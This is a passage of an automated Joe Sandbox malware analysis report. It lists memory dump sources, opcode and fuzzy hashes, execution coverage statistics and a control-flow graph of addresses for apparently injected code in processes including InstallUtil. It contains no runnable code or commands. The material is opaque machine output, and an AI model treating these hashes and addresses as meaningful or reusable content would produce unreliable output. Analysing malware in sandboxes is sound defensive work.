                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: efd242fdd280669c0d8a216e440f388dd9b6f64c18131aabb65aef4d96abc60d
                                                                                                                                  • Instruction ID: e790304c80628df147961e2ae9201ba5e547fe6a051cc5d239c5054f6cb10628
                                                                                                                                  • Opcode Fuzzy Hash: efd242fdd280669c0d8a216e440f388dd9b6f64c18131aabb65aef4d96abc60d
                                                                                                                                  • Instruction Fuzzy Hash: 69E092B4A00248AFC700DFB4A940B5D7FB5DF95200F108599E404CB241D6305E0597A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2dbdb9113faa25de8ae694e3ed70f02e56ff42cfafe735f8e740ccc8f2e8d4ac
                                                                                                                                  • Instruction ID: 232f4751757508bc2e1eb3a653ed81f987501d99ed9b5f651f8e951eb8853ff0
                                                                                                                                  • Opcode Fuzzy Hash: 2dbdb9113faa25de8ae694e3ed70f02e56ff42cfafe735f8e740ccc8f2e8d4ac
                                                                                                                                  • Instruction Fuzzy Hash: ADE09A6114E3C14FD313CF39A920A913FB9EE8B10031A6AEFE4C2CB567C624480BDB65
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513377940.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6bc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c04b5f71732af321c6cc6043da6160ff745a43ed35e5f3451ea277f3890c87aa
                                                                                                                                  • Instruction ID: 57025e6d14f34f671d8a4b1e9b157b47e109ea7c39877a7b14b68937bc9e210b
                                                                                                                                  • Opcode Fuzzy Hash: c04b5f71732af321c6cc6043da6160ff745a43ed35e5f3451ea277f3890c87aa
                                                                                                                                  • Instruction Fuzzy Hash: 16F0A574D04208EFCB84DFA9D940A9DBBB5EB48310F10C0AAA818A3351D7369A61EF80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9ada72b7884610c71d3098cee4ad073e307b12ca128fc2ecaef18d770703c1de
                                                                                                                                  • Instruction ID: acdbc299710722ac4e826bc7efb5ed2d082878342056901453076dc22fd6146b
                                                                                                                                  • Opcode Fuzzy Hash: 9ada72b7884610c71d3098cee4ad073e307b12ca128fc2ecaef18d770703c1de
                                                                                                                                  • Instruction Fuzzy Hash: 4DE08631B4030D5BDBD467654D0079532DDDB45630F21446D96099B2C0DD61D80187B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ead668bff84bc456676b4193a511d8e37d44c6514408f2e6b1fd47537dd2130d
                                                                                                                                  • Instruction ID: 3e5f023d3fecdbac67e4932400b61556cc01d0afeeb323e0671933563417fbc7
                                                                                                                                  • Opcode Fuzzy Hash: ead668bff84bc456676b4193a511d8e37d44c6514408f2e6b1fd47537dd2130d
                                                                                                                                  • Instruction Fuzzy Hash: D0E0E574E0420CEFCB84DFA9D440AADBBF4EB48314F10C1A99818A3341DA35AA46CF80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ead668bff84bc456676b4193a511d8e37d44c6514408f2e6b1fd47537dd2130d
                                                                                                                                  • Instruction ID: ce76d71a0ba28ee15b872e61c5987dfb2d304969c9a907663b68f10ed982dff5
                                                                                                                                  • Opcode Fuzzy Hash: ead668bff84bc456676b4193a511d8e37d44c6514408f2e6b1fd47537dd2130d
                                                                                                                                  • Instruction Fuzzy Hash: 00E0E574E08208EFCB84DFA9D840AADBBF5EB48314F10C0ED981893342DB35AA01DF80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 92cfdfc0d45dd338472e24aabd601ed14bc583a65060fa7e7dd75745237da700
                                                                                                                                  • Instruction ID: c1502f4992a5d8c37ebb4a82104aabeb6a2f24e6667f6dd65aa071735129ad5b
                                                                                                                                  • Opcode Fuzzy Hash: 92cfdfc0d45dd338472e24aabd601ed14bc583a65060fa7e7dd75745237da700
                                                                                                                                  • Instruction Fuzzy Hash: 1AF0F870906219CFEB50CF98D944B9CBBF2FB06314F2041A9D149A7345C774AE858F01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3a4826b45132e7cdae7d198994a445a158537998a9255f8b32596ed6c89027f5
                                                                                                                                  • Instruction ID: 8238914f025d6598dc49dab7ec203bcd8a0c0a6bf4a32c7cf70a8b880fd21ef6
                                                                                                                                  • Opcode Fuzzy Hash: 3a4826b45132e7cdae7d198994a445a158537998a9255f8b32596ed6c89027f5
                                                                                                                                  • Instruction Fuzzy Hash: 2DE017A648E3C28FD3039F2058286C2BF60AB33245B0904DBE1C4861A3C2641215C73A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 51921a800036a5fd2141dfa57cfcaae261bba5f96527db40714548c299891db6
                                                                                                                                  • Instruction ID: 3f221c699225f3f91750a2714dc95ab33105674223e706b502fb7683abb89c55
                                                                                                                                  • Opcode Fuzzy Hash: 51921a800036a5fd2141dfa57cfcaae261bba5f96527db40714548c299891db6
                                                                                                                                  • Instruction Fuzzy Hash: E2E0BF74955108DFC784DFA8D54569DBBF8EB48215F54C0ADD808D3341DB329E51DB81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8b22049374fc8af1e4b095f06ba32bf70da6a73fd34e37e33d7af4ac7106bbda
                                                                                                                                  • Instruction ID: 4362b3c63d1c4ad29d7dc0e6ed92da87b3246047aac6c422b88e54cced1f64ca
                                                                                                                                  • Opcode Fuzzy Hash: 8b22049374fc8af1e4b095f06ba32bf70da6a73fd34e37e33d7af4ac7106bbda
                                                                                                                                  • Instruction Fuzzy Hash: 4AE08C34908248EFCB14EF94DC809ADBFB4EB45319F14C0A9DC0423341CB32AE62DB80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513377940.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6bc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3296004f09ac23d390eb00fe5f69b3477e217a9737730da4a0e1e9a1a699bdfc
                                                                                                                                  • Instruction ID: b761f7b5b1fd4af34f853fc5aeaaa029ea580fa6dbc2c5fad97f29876e0fbbb5
                                                                                                                                  • Opcode Fuzzy Hash: 3296004f09ac23d390eb00fe5f69b3477e217a9737730da4a0e1e9a1a699bdfc
                                                                                                                                  • Instruction Fuzzy Hash: 79E0C2B1840208EFC740EFB8E804A8E7BF9EF05321F0044E5E105E3220EE764E24DBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 46e57874697a6e4b9c7004c5479473951a06ae1080208032a225e7b9350cfc6c
                                                                                                                                  • Instruction ID: 6a6dd220ec9647933fc6e1e89d34fe090e7dd24ff9efee7257f4e90abc9f0688
                                                                                                                                  • Opcode Fuzzy Hash: 46e57874697a6e4b9c7004c5479473951a06ae1080208032a225e7b9350cfc6c
                                                                                                                                  • Instruction Fuzzy Hash: DCE0EC70D55208DFCB91EFB9D44969DBBB4AB08216F1081A99808E3341EBB05A50DB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 94baee5cea4fea8e6824515a60d3931782ed34b60b197f6c1182c3ddd94eeab8
                                                                                                                                  • Instruction ID: dc44c2125a983f18ca1f29b555d1e5ddad8386ede40e6874b75939972b155bd1
                                                                                                                                  • Opcode Fuzzy Hash: 94baee5cea4fea8e6824515a60d3931782ed34b60b197f6c1182c3ddd94eeab8
                                                                                                                                  • Instruction Fuzzy Hash: 65E01270B0030CEFCB44DFB8E951B6EBBBADF85204F1085A9E905DB244DA316F009B94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b268d85a4c5981c88c0125faad6416a869d5abd22c42cc19d14da3de4a9183f5
                                                                                                                                  • Instruction ID: 8c239b5f1dbec535eaf6fb49e580df31c553254212a2e09ea710990a38174c9d
                                                                                                                                  • Opcode Fuzzy Hash: b268d85a4c5981c88c0125faad6416a869d5abd22c42cc19d14da3de4a9183f5
                                                                                                                                  • Instruction Fuzzy Hash: 67E01270A01209EFCB40EFA8E501A5E7BBAEB45304F1041A9D409D7345EA715F0097A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 67efbe88c76fee854d836c4c8a5deae6413ec45aa58c0629bd416b82410a64da
                                                                                                                                  • Instruction ID: b775be0ab3f4b4a11c751da635de6001c3c956e812a193ac41f3b4a647bbc205
                                                                                                                                  • Opcode Fuzzy Hash: 67efbe88c76fee854d836c4c8a5deae6413ec45aa58c0629bd416b82410a64da
                                                                                                                                  • Instruction Fuzzy Hash: 03E0E570901218DFD750DFA4D8497ADBB72EB8A315F00419AE60AB7340CB706E858FA4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513377940.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6bc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 157201360b8a97825aacb5e4a317be6d2114992e6e7c60cdec466246ed81e38d
                                                                                                                                  • Instruction ID: dab53a9c86566d932ac30040ab7371e4dc5def7dd09368d4496b3835331157ae
                                                                                                                                  • Opcode Fuzzy Hash: 157201360b8a97825aacb5e4a317be6d2114992e6e7c60cdec466246ed81e38d
                                                                                                                                  • Instruction Fuzzy Hash: A8D05E74909108EFC744CB95D840A6AB7ACDF46225F5091EC980953341CAB2EE41CB80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 53c816a2fca6be076a9d99d81b2c6020be8e451d7a8dd4cd659c0bbf3648cddc
                                                                                                                                  • Instruction ID: 69ef445fc8bac28853e851f6c4f1afaacdf8079f8bafcf5ed9ae8e118b1189db
                                                                                                                                  • Opcode Fuzzy Hash: 53c816a2fca6be076a9d99d81b2c6020be8e451d7a8dd4cd659c0bbf3648cddc
                                                                                                                                  • Instruction Fuzzy Hash: 5AE0ED705001588FD754EF54D9597ED7772FB49305F0066999206B7740DB705E448F24
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 615c5fca848a6639c3fbbe3e07e192491b0404ae5f4920f0b7cce52559ab64a3
                                                                                                                                  • Instruction ID: 0dd02164673d508201458643db095d3de152734cf163faa499501db196f4be41
                                                                                                                                  • Opcode Fuzzy Hash: 615c5fca848a6639c3fbbe3e07e192491b0404ae5f4920f0b7cce52559ab64a3
                                                                                                                                  • Instruction Fuzzy Hash: 44E04F70A002188FD794DFA4D8547AE7BB2FB89320F00519AA14AB3384CF706E80CF60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1a0ced6862d6a66aaec199723b7df0c35a4f342cfc3ce20c05b58215e2db0f42
                                                                                                                                  • Instruction ID: 043cf71a78d5e497a7a72d86cfbed1ad05956b6ac440b40be524ded919ca266d
                                                                                                                                  • Opcode Fuzzy Hash: 1a0ced6862d6a66aaec199723b7df0c35a4f342cfc3ce20c05b58215e2db0f42
                                                                                                                                  • Instruction Fuzzy Hash: E1E0E570A00218CBE7A0DF14D845BAEBAB2EB4A300F10919DA10AA7280DB705E848F65
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 74eff022c8b4da9f4f740c7b40d122ba1d071708ad8c00c595a280409efa1609
                                                                                                                                  • Instruction ID: a924ac42999995658683f4ee0a41b49d444874d0f584c6e0e5f569083ee833c5
                                                                                                                                  • Opcode Fuzzy Hash: 74eff022c8b4da9f4f740c7b40d122ba1d071708ad8c00c595a280409efa1609
                                                                                                                                  • Instruction Fuzzy Hash: 13E02B70420214CFDB14AF34D8887C83BB5FF05708F0093A480049B311D7315A46CF80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513377940.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6bc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 22918d1fd14fc79a16410e46080407cb6783d9047f1fbf9d07d2b04ed5f69ae6
                                                                                                                                  • Instruction ID: 1ea3e2cca0a8474c7c77e1e6c1892594e2a478e708145cc87aae6cd8ec1b2c41
                                                                                                                                  • Opcode Fuzzy Hash: 22918d1fd14fc79a16410e46080407cb6783d9047f1fbf9d07d2b04ed5f69ae6
                                                                                                                                  • Instruction Fuzzy Hash: C2C08CB00002044EC1C4B7E56C0972A7798AB0133AF806484E51C514029EB46510EB76
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 958399a3469a89b89dcfeeac602bcfd7348509833dcd83804325ae71ee8b44f8
                                                                                                                                  • Instruction ID: 1afc4324f231bb82971247dac905ca71d0eb31ff8af9c4544c3daa5bb08e1c74
                                                                                                                                  • Opcode Fuzzy Hash: 958399a3469a89b89dcfeeac602bcfd7348509833dcd83804325ae71ee8b44f8
                                                                                                                                  • Instruction Fuzzy Hash: 3ED092B4D24268CFDB11DF50D890A8DBBB5BB45340F10929A9809BB280CB709A80CF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514001317.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c80000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a8de4524a73dde40fc1464fa3c10db74567fc826975e29979b17c977057bf73b
                                                                                                                                  • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                                                                                                  • Opcode Fuzzy Hash: a8de4524a73dde40fc1464fa3c10db74567fc826975e29979b17c977057bf73b
                                                                                                                                  • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d9ad763473169c0641f8fa6fbe64d159337e2fdf64f1f53f72e9cce82648aafd
                                                                                                                                  • Instruction ID: 8121da8859fbc121f4068de59a4876f2a47a4e76a9100f80576882e98a3d6068
                                                                                                                                  • Opcode Fuzzy Hash: d9ad763473169c0641f8fa6fbe64d159337e2fdf64f1f53f72e9cce82648aafd
                                                                                                                                  • Instruction Fuzzy Hash: 1DC08C30100209CFF300AF50D855B2D3A32FBC2329F10211C6002AB684CB745C45AB60
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                                                                                                  • API String ID: 0-463314800
                                                                                                                                  • Opcode ID: 9a4885a5a3943fe386faedd0bc6c0de383f6ebe01d440c8b431bf9b4f556eb58
                                                                                                                                  • Instruction ID: 556da0b454b724fef186cba3336a05fb1ab76f5f3d96781ed92ca70c02f05258
                                                                                                                                  • Opcode Fuzzy Hash: 9a4885a5a3943fe386faedd0bc6c0de383f6ebe01d440c8b431bf9b4f556eb58
                                                                                                                                  • Instruction Fuzzy Hash: 03D18032A00219DFCB49DF58D940E99BBB7FF88310F0544A8E609AB276C735ED55DB90

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:19.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:28
                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                  execution_graph 8910 be46d8 8911 be46e4 8910->8911 8914 be48c9 8911->8914 8915 be48e4 8914->8915 8919 be4ef8 8915->8919 8924 be4f08 8915->8924 8916 be4713 8920 be4f2a 8919->8920 8921 be4ff6 8920->8921 8929 bec76c 8920->8929 8935 bec168 8920->8935 8921->8916 8925 be4f2a 8924->8925 8926 be4ff6 8925->8926 8927 bec76c 2 API calls 8925->8927 8928 bec168 LdrInitializeThunk 8925->8928 8926->8916 8927->8926 8928->8926 8930 bec623 8929->8930 8931 bec764 LdrInitializeThunk 8930->8931 8934 bec168 LdrInitializeThunk 8930->8934 8933 bec8c1 8931->8933 8933->8921 8934->8930 8936 bec17f 8935->8936 8937 bec17a 8935->8937 8936->8937 8938 bec8a9 LdrInitializeThunk 8936->8938 8937->8921 8938->8937 8939 becab0 8940 becadd 8939->8940 8941 bec168 LdrInitializeThunk 8940->8941 8942 bee9bf 8940->8942 8944 becde6 8940->8944 8941->8944 8943 bec168 LdrInitializeThunk 8943->8944 8944->8942 8944->8943

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1493 bec168-bec178 1494 bec17f-bec18b 1493->1494 1495 bec17a 1493->1495 1498 bec18d 1494->1498 1499 bec192-bec1a7 1494->1499 1496 bec2ab-bec2b5 1495->1496 1498->1496 1502 bec1ad-bec1b8 1499->1502 1503 bec2bb-bec2fb call be5d08 1499->1503 1506 bec1be-bec1c5 1502->1506 1507 bec2b6 1502->1507 1519 bec302-bec378 call be5d08 call be5c00 1503->1519 1508 bec1c7-bec1de 1506->1508 1509 bec1f2-bec1fd 1506->1509 1507->1503 1518 bec1e4-bec1e7 1508->1518 1508->1519 1514 bec1ff-bec207 1509->1514 1515 bec20a-bec214 1509->1515 1514->1515 1525 bec29e-bec2a3 1515->1525 1526 bec21a-bec224 1515->1526 1518->1507 1523 bec1ed-bec1f0 1518->1523 1554 bec3df-bec454 call be5ca8 1519->1554 1555 bec37a-bec3b7 1519->1555 1523->1508 1523->1509 1525->1496 1526->1507 1530 bec22a-bec246 1526->1530 1536 bec24a-bec24d 1530->1536 1537 bec248 1530->1537 1539 bec24f-bec252 1536->1539 1540 bec254-bec257 1536->1540 1537->1496 1542 bec25a-bec268 1539->1542 1540->1542 1542->1507 1547 bec26a-bec271 1542->1547 1547->1496 1548 bec273-bec279 1547->1548 1548->1507 1550 bec27b-bec280 1548->1550 1550->1507 1551 bec282-bec295 1550->1551 1551->1507 1557 bec297-bec29a 1551->1557 1562 bec4f3-bec4f9 1554->1562 1558 bec3be-bec3dc 1555->1558 1559 bec3b9 1555->1559 1557->1548 1561 bec29c 1557->1561 1558->1554 1559->1558 1561->1496 1563 bec4ff-bec517 1562->1563 1564 bec459-bec46c 1562->1564 1565 bec52b-bec53e 1563->1565 1566 bec519-bec526 1563->1566 1567 bec46e 1564->1567 1568 bec473-bec4c4 1564->1568 1570 bec545-bec561 1565->1570 1571 bec540 1565->1571 1569 bec8c1-bec9bf 1566->1569 1567->1568 1586 bec4c6-bec4d4 1568->1586 1587 bec4d7-bec4e9 1568->1587 1576 bec9c7-bec9d1 1569->1576 1577 bec9c1-bec9c6 call be5ca8 1569->1577 1573 bec568-bec58c 1570->1573 1574 bec563 1570->1574 1571->1570 1581 bec58e 1573->1581 1582 bec593-bec5c5 1573->1582 1574->1573 1577->1576 1581->1582 1591 bec5cc-bec60e 1582->1591 1592 bec5c7 1582->1592 1586->1563 1588 bec4eb 1587->1588 1589 bec4f0 1587->1589 1588->1589 1589->1562 1594 bec615-bec61e 1591->1594 1595 bec610 1591->1595 1592->1591 1596 bec846-bec84c 1594->1596 1595->1594 1597 bec852-bec865 1596->1597 1598 bec623-bec648 1596->1598 1601 bec86c-bec887 1597->1601 1602 bec867 1597->1602 1599 bec64f-bec686 1598->1599 1600 bec64a 1598->1600 1610 bec68d-bec6bf 1599->1610 1611 bec688 1599->1611 1600->1599 1603 bec88e-bec8a2 1601->1603 1604 bec889 1601->1604 1602->1601 1608 bec8a9-bec8bf LdrInitializeThunk 1603->1608 1609 bec8a4 1603->1609 1604->1603 1608->1569 1609->1608 1613 bec723-bec736 1610->1613 1614 bec6c1-bec6e6 1610->1614 1611->1610 1615 bec73d-bec762 1613->1615 1616 bec738 1613->1616 1617 bec6ed-bec71b 1614->1617 1618 bec6e8 1614->1618 1621 bec764-bec765 1615->1621 1622 bec771-bec7a9 1615->1622 1616->1615 1617->1613 1618->1617 1621->1597 1623 bec7ab 1622->1623 1624 bec7b0-bec811 call bec168 1622->1624 1623->1624 1630 bec818-bec83c 1624->1630 1631 bec813 1624->1631 1634 bec83e 1630->1634 1635 bec843 1630->1635 1631->1630 1634->1635 1635->1596
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.3285147470.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_be0000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7d24883f8253e22a2a75ecc47000b76d7ef25c692203752b123ea936ed475203
                                                                                                                                  • Instruction ID: bf5922fc1005aa43c178e00ecfd50a452d0faa4f0aa89693977c68b731a9fe0c
                                                                                                                                  • Opcode Fuzzy Hash: 7d24883f8253e22a2a75ecc47000b76d7ef25c692203752b123ea936ed475203
